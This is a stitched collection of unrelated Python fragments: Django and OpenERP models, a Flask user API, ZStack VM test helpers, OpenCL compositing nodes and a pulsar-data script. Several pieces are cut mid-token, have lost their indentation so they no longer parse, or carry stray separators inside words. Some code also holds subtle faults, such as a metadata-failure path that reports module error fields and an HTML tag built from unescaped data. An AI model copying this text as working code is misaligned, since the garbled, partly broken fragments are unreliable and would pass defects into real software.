            items_total = sync_report.modules_total_count
            item_type = _('Module')
            self._render_itemized_in_progress_state(items_done, items_total, item_type,
                                                    self.sync_modules_bar, sync_report.modules_state)
        # The only state left to handle is if it failed
        else:
            self.prompt.render_failure_message(_('... failed'))
            self.prompt.render_spacer()
            self._render_error(sync_report.modules_error_message,
                               sync_report.modules_exception,
                               sync_report.modules_traceback)
        # Regardless of success or failure, display any individual module errors
        # if the new state is complete
        if sync_report.modules_state in constants.COMPLETE_STATES:
            self._render_module_errors(sync_report.modules_individual_errors)
        # Before finishing update the state
        self.sync_modules_last_state = sync_report.modules_state
    def _display_publish_modules_step(self, publish_report):
        """Render progress for the module step of a publish."""
        # Do nothing if it hasn't started yet or has already finished
        if publish_report.modules_state == constants.STATE_NOT_STARTED or \
           self.publish_modules_last_state in constants.COMPLETE_STATES:
            return
        # Only render this on the first non-not-started state
        if self.publish_modules_last_state == constants.STATE_NOT_STARTED:
            self.prompt.write(_('Publishing modules...'), tag='publishing')
        # Same behavior for running or success
        if publish_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
            # Errored modules still count as processed for the bar.
            items_done = publish_report.modules_finished_count + publish_report.modules_error_count
            items_total = publish_report.modules_total_count
            item_type = _('Module')
            self._render_itemized_in_progress_state(items_done, items_total, item_type,
                                                    self.publish_modules_bar, publish_report.modules_state)
        # The only state left to handle is if it failed
        else:
            self.prompt.render_failure_message(_('... failed'))
            self.prompt.render_spacer()
            self._render_error(publish_report.modules_error_message,
                               publish_report.modules_exception,
                               publish_report.modules_traceback)
        # Regardless of success or failure, display any individual module errors
        # if the new state is complete
        if publish_report.modules_state in constants.COMPLETE_STATES:
            self._render_module_errors(publish_report.modules_individual_errors)
        # Before finishing update the state
        self.publish_modules_last_state = publish_report.modules_state
def _display_publish_metadata_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.metadata_state == constants.STATE_NOT_STARTED or \
self.publish_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Generating repository metadata...'), tag='generating')
if publish_report.metadata_state == constants.STATE_RUNNING:
self.publish_metadata_spinner.next()
elif publish_report.metadata_state == constants.STATE_SUCCESS:
self.publish_metadata_spinner.next(finished=True)
self.prompt.write(_('... completed'), tag='completed')
self.prompt.render_spacer()
elif publish_report.metadata_state == constants.STATE_FAILED:
self.publish_metadata_spinner.next(finished=True)
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
self.publish_metadata_last_state = publish_report.metadata_state
d |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-04 12:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class | Migration(migrations.Migration):
dependencies = [
('communities', '0013_auto_20160801_1241'),
]
operations = [
migr | ations.AlterField(
model_name='groupuser',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_users', to='communities.CommunityGroup', verbose_name='Group'),
),
]
|
from croplands_api import api
from croplands_api.models import User
from croplands_api.views.api.processors import api_roles, remove_relations
from croplands_api.exceptions imp | ort Unauthorized
from croplands_api.auth import is_anonymou | s, current_user, verify_role
def can_edit_the_user(data=None, **kwargs):
    """
    Determines if the current user can modify the specified user account.
    Allowed for the account owner or an admin; everyone else (including
    anonymous callers) gets Unauthorized.
    :param data:
    :param kwargs: must contain 'instance_id'
    :return: None
    """
    if is_anonymous():
        raise Unauthorized()
    is_owner = (hasattr(current_user, 'id')
                and current_user.id == int(kwargs['instance_id']))
    if not (is_owner or verify_role('admin')):
        raise Unauthorized()
def check_for_me(data=None, **kwargs):
    """
    Swap the 'me' alias in the instance id for the authenticated
    user's real id.
    :param data:
    :param kwargs: expected to carry 'instance_id'
    :return: None
    """
    if is_anonymous():
        raise Unauthorized(description="Must send token.")
    if kwargs['instance_id'] == 'me':
        # NOTE(review): this assigns into the *local* dict created by
        # **kwargs, so the caller never observes the substitution.
        # Verify against the flask-restless preprocessor contract —
        # GET_SINGLE preprocessors may need to return the new id instead.
        kwargs['instance_id'] = current_user.id
def ignore_read_only_fields(data=None, **kwargs):
    """
    Silently drop read-only fields from an incoming payload.
    An alternative design would be to answer 409 Conflict instead.
    :param data: json dict, scrubbed in place
    :param kwargs:
    :return: None
    """
    protected = ('password', 'attempts', 'email_verification_token',
                 'score', 'id', 'status')
    for name in protected:
        if name in data:
            del data[name]
def create(app):
    """Register the /users REST endpoint on the Flask app.

    Only GET and PATCH are exposed.  Single-record GET supports the
    'me' alias; PATCH is restricted to the account owner or an admin,
    and read-only fields are stripped from the payload.  Sensitive
    columns are excluded from every response.
    """
    api.create_api(User,
                   app=app,
                   collection_name='users',
                   methods=['GET', 'PATCH'],
                   results_per_page=50,
                   preprocessors={
                       'GET_SINGLE': [check_for_me],
                       'PATCH_SINGLE': [can_edit_the_user, remove_relations,
                                        ignore_read_only_fields],
                       'PATCH_MANY': [api_roles('admin'), remove_relations,
                                      ignore_read_only_fields],
                       'DELETE': [api_roles('admin'), ]
                   },
                   postprocessors={
                   },
                   exclude_columns=['email', 'password', 'attempts',
                                    'email_verification_token', 'status']
                   )
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp.exceptions import UserError
class account_bank_statement(osv.osv):
    # Extends the core bank statement so statement-line state follows
    # the statement's confirm/cancel buttons.
    _inherit = 'account.bank.statement'
    def write(self, cr, uid, ids, vals, context=None):
        """Write that skips the obsolete statement-line resequencing.

        When lines are being written or an e-banking import is running,
        the immediate parent implementation is deliberately bypassed by
        calling osv.osv's write directly (super(osv.osv, ...)).
        """
        if context is None:
            context = {}
        # bypass obsolete statement line resequencing
        if vals.get('line_ids', False) or context.get('ebanking_import', False):
            res = super(osv.osv, self).write(cr, uid, ids, vals, context=context)
        else:
            res = super(account_bank_statement, self).write(cr, uid, ids, vals, context=context)
        return res
    def button_confirm_bank(self, cr, uid, ids, context=None):
        """Confirm the statement, then flag all its lines 'confirm'.

        Raw SQL is used for the bulk state change; the ORM cache is
        invalidated afterwards so readers see the new state.
        """
        bank_statement_line_obj = self.pool.get('account.bank.statement.line')
        super(account_bank_statement, self).button_confirm_bank(cr, uid, ids, context=context)
        for st in self.browse(cr, uid, ids, context=context):
            if st.line_ids:
                line_ids = [l.id for l in st.line_ids]
                cr.execute("UPDATE account_bank_statement_line \
                    SET state='confirm' WHERE id in %s ",
                    (tuple(line_ids),))
                bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
        return True
    def button_cancel(self, cr, uid, ids, context=None):
        """Cancel the statement, then put all its lines back to 'draft'.

        Mirror image of button_confirm_bank: bulk SQL update plus ORM
        cache invalidation.
        """
        bank_statement_line_obj = self.pool.get('account.bank.statement.line')
        super(account_bank_statement, self).button_cancel(cr, uid, ids, context=context)
        for st in self.browse(cr, uid, ids, context=context):
            if st.line_ids:
                line_ids = [l.id for l in st.line_ids]
                cr.execute("UPDATE account_bank_statement_line \
                    SET state='draft' WHERE id in %s ",
                    (tuple(line_ids),))
                bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
        return True
class account_bank_statement_line_global(osv.osv):
    # Hierarchical batch-payment ("globalisation") records grouping
    # several bank statement lines under one code.
    _name = 'account.bank.statement.line.global'
    _description = 'Batch Payment Info'
    _columns = {
        'name': fields.char('OBI', required=True, help="Originator to Beneficiary Information"),
        'code': fields.char('Code', size=64, required=True),
        'parent_id': fields.many2one('account.bank.statement.line.global', 'Parent Code', ondelete='cascade'),
        'child_ids': fields.one2many('account.bank.statement.line.global', 'parent_id', 'Child Codes', copy=True),
        'type': fields.selection([
            ('iso20022', 'ISO 20022'),
            ('coda', 'CODA'),
            ('manual', 'Manual'),
            ], 'Type', required=True),
        'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
        'bank_statement_line_ids': fields.one2many('account.bank.statement.line', 'globalisation_id', 'Bank Statement Lines'),
    }
    _rec_name = 'code'
    _defaults = {
        # Codes come from a dedicated ir.sequence; names default to '/'.
        'code': lambda s,c,u,ctx={}: s.pool.get('ir.sequence').next_by_code(c, u, 'account.bank.statement.line.global'),
        'name': '/',
    }
    _sql_constraints = [
        ('code_uniq', 'unique (code)', 'The code must be unique !'),
    ]
    def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
        """Search by code first, then by name, then by 'code name' pairs."""
        if not args:
            args = []
        ids = []
        if name:
            ids = self.search(cr, user, [('code', 'ilike', name)] + args, limit=limit)
            if not ids:
                ids = self.search(cr, user, [('name', operator, name)] + args, limit=limit)
            if not ids and len(name.split()) >= 2:
                #Separating code and name for searching
                operand1, operand2 = name.split(' ', 1) #name can contain spaces
                ids = self.search(cr, user, [('code', 'like', operand1), ('name', operator, operand2)] + args, limit=limit)
        else:
            ids = self.search(cr, user, args, context=context, limit=limit)
        return self.name_get(cr, user, ids, context=context)
class account_bank_statement_line(osv.osv):
    """Extend bank statement lines with batch-payment and counterparty data.

    Adds a draft/confirm workflow state plus a link to the globalisation
    (batch payment) record, and guards against deleting lines outside their
    parent statement.
    """
    _inherit = 'account.bank.statement.line'
    _columns = {
        'val_date': fields.date('Value Date', states={'confirm': [('readonly', True)]}),
        'globalisation_id': fields.many2one('account.bank.statement.line.global', 'Globalisation ID',
            states={'confirm': [('readonly', True)]},
            help="Code to identify transactions belonging to the same globalisation level within a batch payment"),
        # Read-only mirror of the linked globalisation record's amount.
        'globalisation_amount': fields.related('globalisation_id', 'amount', type='float',
            relation='account.bank.statement.line.global', string='Glob. Amount', readonly=True),
        'state': fields.selection([('draft', 'Draft'), ('confirm', 'Confirmed')],
            'Status', required=True, readonly=True, copy=False),
        'counterparty_name': fields.char('Counterparty Name', size=35),
        'counterparty_bic': fields.char('Counterparty BIC', size=11),
        'counterparty_number': fields.char('Counterparty Number', size=34),
        'counterparty_currency': fields.char('Counterparty Currency', size=3),
    }
    _defaults = {
        'state': 'draft',
    }
    def unlink(self, cr, uid, ids, context=None):
        """Block deletion when the caller flags it via the context.

        Callers that want statement lines managed only through their parent
        statement set ``block_statement_line_delete`` in the context.
        """
        if context is None:
            context = {}
        if context.get('block_statement_line_delete', False):
            raise UserError(_('Delete operation not allowed. Please go to the associated bank statement in order to delete and/or modify bank statement line.'))
        return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)
|
# Flask development settings.
DEBUG = True  # enables the interactive debugger/reloader; never use in production
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/test.db'  # throwaway SQLite DB under /tmp
from django.template import Library, Node, Variable, VariableDoesNotExist
from django.core.urlresolvers import revers | e
from job_board.views import job_list_by_tag
register = Library()
def do_populate_tags(parser, token):
    """Compile the ``populate_tag`` template tag.

    Expects exactly one argument — the template variable holding the tag
    object — and hands it to PopulateTagsNode for rendering.

    Arguments:
    - `parser`: the template parser (unused here)
    - `token`: the tag token; split into the tag name and its argument
    """
    bits = token.split_contents()
    # Bug fix: removed a leftover `print bits` debug statement that wrote to
    # stdout on every template compilation.
    return PopulateTagsNode(bits[1])
class PopulateTagsNode(Node):
    """Render one tag as a link sized and weighted by its ``font_size``."""

    def __init__(self, tag):
        # Resolved lazily at render time against the template context.
        self.tag_tag = Variable(tag)

    def render(self, context):
        """Return the tag's HTML snippet, or '' when the variable is missing."""
        try:
            tag_obj = self.tag_tag.resolve(context)
        except VariableDoesNotExist:
            return ''
        size = tag_obj.font_size + 10
        weight = min(900, 300 + tag_obj.font_size * 100)
        url = reverse(job_list_by_tag, kwargs={'tag_name': tag_obj.name})
        return "<span style='font-size:%spx;font-weight:%s'><a href='%s'>%s</a></span>" % (size, weight, url, tag_obj.name)
register.tag('populate_tag', do_populate_tags) |
# -*- coding: utf-8 -*-
# Copyright 2016 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
'name': 'L10n Br Resource',
'summary': """
This module extend core resource to create important brazilian
informations. Define a Brazilian calendar and some tools to compute
dates used in financial and payroll modules""",
'version | ': '8.0.1.0.0',
'license': 'AGPL-3',
'author': 'KMEE,Odoo Community Association (OCA)',
'website': 'www.odoobrasil.org.br',
'depends': [
'l10n_br_base',
'resource',
],
'external_dependencies': {
'python': ['pybrasil'],
},
'data': [
'views/resource_calendar.xml',
'views/resource_calendar_leaves. | xml',
'views/menu_resource_calendar.xml',
'wizard/workalendar_holiday_import.xml',
],
}
|
nv, bandwidth, path = '/tmp', raise_exception=True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 360
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
if '/dev/' in path:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=100M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=900M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
else:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=100M -filename=%s/test1.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=900M -filename=%s/test2.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
test_util.test_logger('test_fio_bandwidth: %s' % line)
results = line.split()
for result in results:
if 'bw=' in result:
if 'MB' in result:
bw = int(float(result[3:].split('MB')[0])) * 1024
else:
bw = int(float(result[3:].split('KB')[0]))
#cleanup_log()
if bw == 0:
if not raise_exception:
test_util.test_logger('Did not get bandwidth for fio test')
return False
test_util.test_fail('Did not get bandwidth for fio test')
threshold = bandwidth/1024/2
bw_up_limit = bandwidth/1024 + threshold
bw_down_limit = bandwidth/1024 - threshold
if bw > bw_down_limit and bw < bw_up_limit:
test_util.test_logger('disk bandwidth:%s is between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
return True
else:
test_util.test_logger('disk bandwidth:%s is not between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
if raise_exception:
test_util.test_fail('fio bandwidth test fails')
return False
def create_volume(volume_creation_option=None, session_uuid=None):
    """Create and return a test volume.

    When no creation option is supplied, a default one is built from the
    first available disk offering (session_uuid only applies in that case,
    matching the original behaviour).
    """
    if not volume_creation_option:
        default_offering_uuid = res_ops.query_resource(res_ops.DISK_OFFERING)[0].uuid
        volume_creation_option = test_util.VolumeOption()
        volume_creation_option.set_disk_offering_uuid(default_offering_uuid)
        volume_creation_option.set_name('vr_test_volume')
        volume_creation_option.set_session_uuid(session_uuid)
    new_volume = zstack_volume_header.ZstackTestVolume()
    new_volume.set_creation_option(volume_creation_option)
    new_volume.create()
    return new_volume
def migrate_vm_to_random_host(vm, timeout = None):
    """Migrate a VM to a randomly chosen host and verify it landed there.

    Fails the test if no host is available after migration or if the VM
    ended up on a host other than the chosen target.
    """
    test_util.test_dsc("migrate vm to random host")
    target_host = test_lib.lib_find_random_host(vm.vm)
    current_host = test_lib.lib_find_host_by_vm(vm.vm)
    vm.migrate(target_host.uuid, timeout)
    new_host = test_lib.lib_get_vm_host(vm.vm)
    if not new_host:
        test_util.test_fail('Not find available Hosts to do migration')
    if new_host.uuid != target_host.uuid:
        # Bug fix: the message had only three %s placeholders for four
        # arguments, so this failure path itself raised a TypeError.
        test_util.test_fail('[vm:] %s did not migrate from [host:] %s to target [host:] %s, but to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid, new_host.uuid))
    else:
        test_util.test_logger('[vm:] %s has been migrated from [host:] %s to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid))
def create_eip(eip_name=None, vip_uuid=None, vnic_uuid=None, vm_obj=None, \
        session_uuid = None):
    """Create and return a test EIP.

    When vip_uuid is omitted a VIP is acquired on the public L3 network.
    If vnic_uuid is given, vm_obj must be provided as well.
    """
    # Robustness: validate arguments before acquiring a VIP, so an invalid
    # call no longer leaks a freshly acquired VIP resource.
    if vnic_uuid and not vm_obj:
        test_util.test_fail('vm_obj can not be None in create_eip() API, when setting vm_nic_uuid.')
    if not vip_uuid:
        l3_name = os.environ.get('l3PublicNetworkName')
        l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
        vip_uuid = net_ops.acquire_vip(l3_uuid).uuid
    eip_option = test_util.EipOption()
    eip_option.set_name(eip_name)
    eip_option.set_vip_uuid(vip_uuid)
    eip_option.set_vm_nic_uuid(vnic_uuid)
    eip_option.set_session_uuid(session_uuid)
    eip = zstack_eip_header.ZstackTestEip()
    eip.set_creation_option(eip_option)
    eip.create(vm_obj)
    return eip
def create_vip(vip_name=None, l3_uuid=None, session_uuid = None, required_ip=None):
    """Create and return a test VIP, defaulting to the public L3 network."""
    vip_name = vip_name or 'test vip'
    if not l3_uuid:
        public_l3_name = os.environ.get('l3PublicNetworkName')
        l3_uuid = test_lib.lib_get_l3_by_name(public_l3_name).uuid
    creation_option = test_util.VipOption()
    creation_option.set_name(vip_name)
    creation_option.set_l3_uuid(l3_uuid)
    creation_option.set_session_uuid(session_uuid)
    creation_option.set_requiredIp(required_ip)
    new_vip = zstack_vip_header.ZstackTestVip()
    new_vip.set_creation_option(creation_option)
    new_vip.create()
    return new_vip
def create_vip_with_ip(vip_name=None, l3_uuid=None, required_ip=None, session_uuid = None):
    """Create a VIP with a specific required IP.

    Consistency: this was a byte-for-byte duplicate of create_vip() (which
    already accepts required_ip); it is kept only for backward-compatible
    argument order and now delegates.
    """
    return create_vip(vip_name=vip_name, l3_uuid=l3_uuid,
                      session_uuid=session_uuid, required_ip=required_ip)
def attach_mount_volume(volume, vm, mount_point):
    """Attach a volume to a VM and mount its first partition at mount_point.

    Writes a small shell script to a temp file, runs it inside the guest via
    test_lib, and fails the test if the mount does not succeed.
    """
    volume.attach(vm)
    import tempfile
    # delete=False: the file must survive close() so the helper can read it;
    # it is removed manually below.
    script_file = tempfile.NamedTemporaryFile(delete=False)
    # The script picks the last whole-disk device in /dev (assumed to be the
    # freshly attached volume) and mounts its first partition.
    script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | grep disk | awk '{print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
''' % (mount_point, mount_point))
    script_file.close()
    vm_inv = vm.get_vm()
    if not test_lib.lib_execute_shell_script_in_vm(vm_inv, script_file.name):
        test_util.test_fail("mount operation failed in [volume:] %s in [vm:] %s" % (volume.get_volume().uuid, vm_inv.uuid))
    os.unlink(script_file.name)
def time_convert(log_str):
    """Convert a log line's leading timestamp to integer epoch milliseconds.

    Expects the line to begin with 'YYYY-MM-DD HH:MM:SS,mmm ...'; the epoch
    conversion uses local time (time.mktime).
    """
    fields = log_str.split()
    stamp = fields[0] + ' ' + fields[1]
    pieces = stamp.split(',')
    seconds_str = pieces[0]
    millis_str = pieces[1]
    parsed = time.strptime(seconds_str, "%Y-%m-%d %H:%M:%S")
    return int(time.mktime(parsed) * 1000 + int(millis_str))
def get_stage_time(vm_name, begin_time):
mn_server_log = "/usr/local/zstacktest/apache-tomcat/logs/management-server.log"
file_obj = open(mn_server_log)
for line in file_obj.readlines():
if line.find('APICreateVmInstanceMsg') != -1 and line.find(vm_name) != -1:
time_stamp = time_convert(line)
if int(time_stamp) >= begin_time:
api_id = line.split('{"', 1)[1].split(',')[-3].sp |
"""
Copyright (c) 2012-2020 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without | even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from smart_manager.models import CPUMetric
from smart_manager.serializers import CPUMetricSerializer
from generic_sprobe impor | t GenericSProbeView
class CPUMetricView(GenericSProbeView):
    """Smart-probe REST view serving CPUMetric records."""
    serializer_class = CPUMetricSerializer  # serializer used by the generic view
    model_obj = CPUMetric  # model the generic view queries
|
from django.template import Context | , loader
from pokemon.models import Pokemon
from django.http import HttpResponse
from django.http import Http404
def index(request):
    """Render the Pokemon list page, ordered by pokedex id."""
    all_pokemon = Pokemon.objects.all().order_by('id_pokemon')
    template = loader.get_template('pokemon/index.html')
    context = Context({'Pokemons': all_pokemon})
    return HttpResponse(template.render(context))
def pokemon(request, id):
    """Render the detail page for one Pokemon; 404 when the id is unknown."""
    try:
        creature = Pokemon.objects.get(id_pokemon=id)
    except Pokemon.DoesNotExist:
        raise Http404
    template = loader.get_template('pokemon/pokemon.html')
    return HttpResponse(template.render(Context({'Pokemon': creature, })))
#
# Copyright (c) 2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU Lesser General Public
# License as published by the Free Software Fou | ndation; either version
# 2 of the License (LGPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You s | hould
# have received a copy of LGPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt.
#
# Jeff Ortel <jortel@redhat.com>
#
"""
The I{metrics} module defines classes and other resources
designed for collecting and reporting performance metrics.
"""
import time
from math import modf
class Timer:
    """Wall-clock stopwatch with a human-readable string form.

    The string form scales its unit: milliseconds below one second,
    seconds below one minute, minutes otherwise.
    """

    def __init__(self, started=0, stopped=0):
        self.started = started
        self.stopped = stopped

    def start(self):
        """Mark the current time as the start and clear any stop mark."""
        self.started = time.time()
        self.stopped = 0
        return self

    def stop(self):
        """Mark the current time as the stop; no-op if never started."""
        if self.started > 0:
            self.stopped = time.time()
        return self

    def duration(self):
        """Elapsed seconds between the start and stop marks."""
        return self.stopped - self.started

    def __str__(self):
        if self.started == 0:
            return 'not-running'
        if self.started > 0 and self.stopped == 0:
            return 'started: %d (running)' % self.started
        elapsed = self.duration()
        if elapsed < 1:
            return '%d (ms)' % (elapsed * 1000)
        if elapsed < 60:
            fraction, whole = modf(elapsed)
            return '%d.%.3d (seconds)' % (whole, fraction * 1000)
        fraction, whole = modf(elapsed / 60)
        return '%d.%.3d (minutes)' % (whole, fraction * 1000)
|
__vers | ion_info__ = ('1', '0', '0')
__version__ = '.'.joi | n(__version_info__)
|
from copper.cop.cop_node import CopNode
import pyopencl as cl
import numpy
from PIL import Image
class COP2_Comp_Add(CopNode):
    '''
    This filter adds foreground over background using OpenCL
    '''
    type_name = "add"
    category = "comps"

    def __init__(self, engine, parent):
        # Bug fix: super() previously referenced the nonexistent class name
        # CLC_Comp_Add, raising NameError on construction.
        super(COP2_Comp_Add, self).__init__(engine, parent)
        self.program = engine.load_program("comp_add.cl")
        self.__inputs__ = [None, None]
        self.__input_names__ = ["Input 1", "Input 2"]

    def compute(self):
        """Run the OpenCL add kernel over both inputs into a new buffer."""
        self.width, self.height = self.input(0).size
        self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
        sampler = cl.Sampler(self.engine.ctx,
                             True,  # Normalized coordinates
                             cl.addressing_mode.CLAMP_TO_EDGE,
                             cl.filter_mode.LINEAR)
        exec_evt = self.program.run_add(self.engine.queue, self.size, None,
                                        self.input(0).getOutDevBuffer(),
                                        self.input(1).getOutDevBuffer(),
                                        self.devOutBuffer,
                                        sampler,
                                        numpy.int32(self.width),
                                        numpy.int32(self.height),
                                        )
        # Block until the kernel finishes so downstream nodes see the result.
        exec_evt.wait()
class COP2_Comp_Blend(CopNode):
    '''
    This filter blends foreground over background using OpenCL
    '''
    type_name = "blend"
    category = "comps"

    def __init__(self, engine, parent):
        # Bug fix: super() previously referenced the nonexistent class name
        # CLC_Comp_Blend, raising NameError on construction.
        super(COP2_Comp_Blend, self).__init__(engine, parent)
        self.program = engine.load_program("comp_blend.cl")
        self.__inputs__ = [None, None]
        self.__input_names__ = ["Input 1", "Input 2"]
        self.addParameter("factor", float, 0.5)

    def bypass_node(self):
        """Short-circuit to one input when the blend factor is all-or-nothing."""
        factor = self.parm("factor").evalAsFloat()
        if factor <= 0.0:
            self.log("Bypassing with node %s at input 0" % (self.input(0).path()))
            return self.input(0)
        if factor >= 1.0:
            self.log("Bypassing with node %s at input 1" % (self.input(1).path()))
            return self.input(1)
        return None

    def compute(self):
        """Run the OpenCL blend kernel, weighting inputs by the factor parm."""
        self.width, self.height = self.input(0).size
        self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
        sampler = cl.Sampler(self.engine.ctx,
                             True,  # Normalized coordinates
                             cl.addressing_mode.CLAMP_TO_EDGE,
                             cl.filter_mode.LINEAR)
        exec_evt = self.program.run_blend(self.engine.queue, self.size, None,
                                          self.input(0).getOutDevBuffer(),
                                          self.input(1).getOutDevBuffer(),
                                          self.devOutBuffer,
                                          sampler,
                                          numpy.int32(self.width),
                                          numpy.int32(self.height),
                                          numpy.float32(self.parm("factor").evalAsFloat())
                                          )
        # Block until the kernel finishes so downstream nodes see the result.
        exec_evt.wait()
|
"""Scikit Flow Estimators."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "L | icense");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# li | mitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.learn.python.learn.estimators.base import TensorFlowEstimator, TensorFlowBaseTransformer
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearRegressor
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowRegressor
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.autoencoder import TensorFlowDNNAutoencoder
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
|
from django import for | ms
from models | import edi_address
class DocumentForm(forms.ModelForm):
    """Upload form bound to edi_address, exposing only the file field."""
    docfile = forms.FileField()
    class Meta:
        model = edi_address
        fields = ["docfile",]
|
}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
